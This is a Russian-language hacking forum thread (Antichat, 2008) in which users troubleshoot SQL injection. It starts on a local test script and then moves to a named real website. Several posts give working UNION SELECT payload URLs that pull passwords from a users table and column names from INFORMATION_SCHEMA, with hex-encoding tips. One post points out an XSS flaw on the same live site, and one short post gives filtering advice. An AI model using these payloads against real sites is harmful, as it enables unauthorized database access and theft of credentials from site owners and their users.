ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.05.2008, 13:21
|
|
Участник форума
Регистрация: 23.04.2008
Сообщений: 132
Провел на форуме:
103153
Репутация:
13
|
|
Зароботало , нужно заменить
$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";//Уязвимый запрос
на
$zapros="SELECT * FROM news WHERE id=".$_GET['id'].";";//Уязвимый запрос
|
|
|
12.05.2008, 13:32
|
|
Участник форума
Регистрация: 23.04.2008
Сообщений: 132
Провел на форуме:
103153
Репутация:
13
|
|
что в этом запросе неверно ???
http://localhost/sait/tmp/sql.php?id=-1+UNION+SELECT+password+FROM+users+WHERE+login=Adm in/*
результат :
Unknown column 'admin' in 'where clause'
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\sait\tmp\sql.php on line 24
Последний раз редактировалось lomerok; 12.05.2008 в 13:43..
|
|
|
|
12.05.2008, 13:40
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от lomerok
что в этом запросе неверно ???
http://localhost/sait/tmp/sql.php?id=-1+UNION+SELECT+password+FROM+users+WHERE+login=Adm in/*
Если не кодируешь в hex/char, то обрамляй логин кавычками.
|
|
|
|
12.05.2008, 13:47
|
|
Участник форума
Регистрация: 23.04.2008
Сообщений: 132
Провел на форуме:
103153
Репутация:
13
|
|
http://localhost/sait/tmp/sql.php?id=-1+UNION+SELECT+password+FROM+users+WHERE+'login=Ad min'/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'login=Admin\'/*' at line 1
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\sait\tmp\sql.php on line 24
------------
Поставил кавычки .......... что теперь нетак ?
Последний раз редактировалось lomerok; 12.05.2008 в 13:51..
|
|
|
|
12.05.2008, 13:50
|
|
Постоянный
Регистрация: 20.08.2006
Сообщений: 327
Провел на форуме:
2472378
Репутация:
1077
|
|
1. не выводится потому, что после юнион у селекта должно быть столько же параметров сколько и до него, на сколько помню
2. судя по всему ты используешь денвер и magic_quotes у тебя отключены поумолчанию... кодируй Admin в hex
Код:
?id=-1+UNION+SELECT+1,2,3,4,password+FROM+users+WHERE+login=0x41646d696e
Последний раз редактировалось TAHA; 12.05.2008 в 13:53..
|
|
|
|
12.05.2008, 13:51
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Омг, http://hack-shop.org.ru/tools-code-encode
|
|
|
|
11.06.2008, 21:52
|
|
Новичок
Регистрация: 13.09.2007
Сообщений: 5
Провел на форуме:
23346
Репутация:
3
|
|
Статья неплохая, только вот :
1)САМОЕ ГЛАВНОЕ ФИЛЬТРОВАТЬ КАВЫЧКИ.
-------------------------------
2)Если используется оператор сравнения строк LIKE фильтровать знаки “%” и “_”
-------------------------------
3)Не использовать при сравнении прерменных без кавычек типа SELECT …WHERE id=$id а использовать так SELECT ...WHERE id='$id' и обратиться к пункту 1
Почему бы просто не юзать sp c параметрами (следя чтобы эти параметры не юзались с exec ) ? |
|
|
|
19.06.2008, 07:47
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257
Репутация:
627
|
|
Сообщение от Sandjuro
Чего я ни так делаю, почему вместо вывода столбцов ошбка?
http://www.oke.ru/xo4u.php?id=-42708+UNION+select+1,2,COLUMN_NAME,4,5,6,7,8,9,10+ FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=' chausers'+LIMIT+0,1/*
Вот так делай: chausers переводишь в HEX ВОТ ТУТ, у тебя получится
636861757365727300 и дописываешь перед хексом 0x, потом вставляешь и вот как должно все выглядеть.
Кто будет пользоватся этим декодером, удаляйте 2 лишних нуля в конце, 6368617573657273 00
вот они.
Код:
http://www.oke.ru/xo4u.php?id=-42708+UNION+select+1,2,COLUMN_NAME,4,5,6,7,8,9,10+%20FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6368617573657273+LIMIT+0,1/*
ЗЫ Кстати там ХСС пашет, в 2х полях: имени и мыле.
http://www.oke.ru/xo4u.php?id=-42717
Последний раз редактировалось Лайт; 19.06.2008 в 16:01..
Причина: 00
|
|
|
|
19.06.2008, 08:19
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
Лайт, не выходит всеравно :\
|
|
|
|
19.06.2008, 11:35
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257
Репутация:
627
|
|
Сообщение от Sandjuro
Лайт, не выходит всеравно :\
Если такая тема с колонками не проходит, тогда как ты смог имя таблицы узнать? Если знаешь имя таблицы, где должен лежать логин пасс, то просто подбери имя колонки основываясь здравым смыслом, или посмотри в исходнике страницы, через какие переменные передаются значения логина/пасса.
ЗЫ Сам этот сервис весьма странный, я не смог там найти ни админки, ни полей логинн/пасс...
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
